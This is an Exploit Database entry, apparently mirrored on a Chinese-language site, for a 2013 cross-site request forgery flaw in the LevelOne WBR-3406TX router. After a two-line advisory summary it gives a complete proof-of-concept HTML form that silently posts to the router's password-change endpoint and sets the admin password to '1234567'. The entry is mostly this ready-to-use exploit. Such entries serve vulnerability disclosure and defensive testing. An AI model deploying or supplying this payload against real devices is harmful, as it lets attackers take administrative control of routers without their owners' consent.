LevelOne WBR-3406TX Router – Cross-Site Request Forgery

• Exploit Database
• 40 阅读

• 作者： Yakir Wizman
  日期： 2013-11-15
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38851/

• source: https://www.securityfocus.com/bid/63908/info
  
  LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability.
  
  Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
  
  <html>
  <body>
  <form action="http://www.example.com/cgi-bin/pass" method="POST">
  <input type="hidden" name="rc" value="@" />
  <input type="hidden" name="Pa" value="1234567" />
  <input type="hidden" name="P1" value="1234567" />
  <input type="hidden" name="rd" value="atbox" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>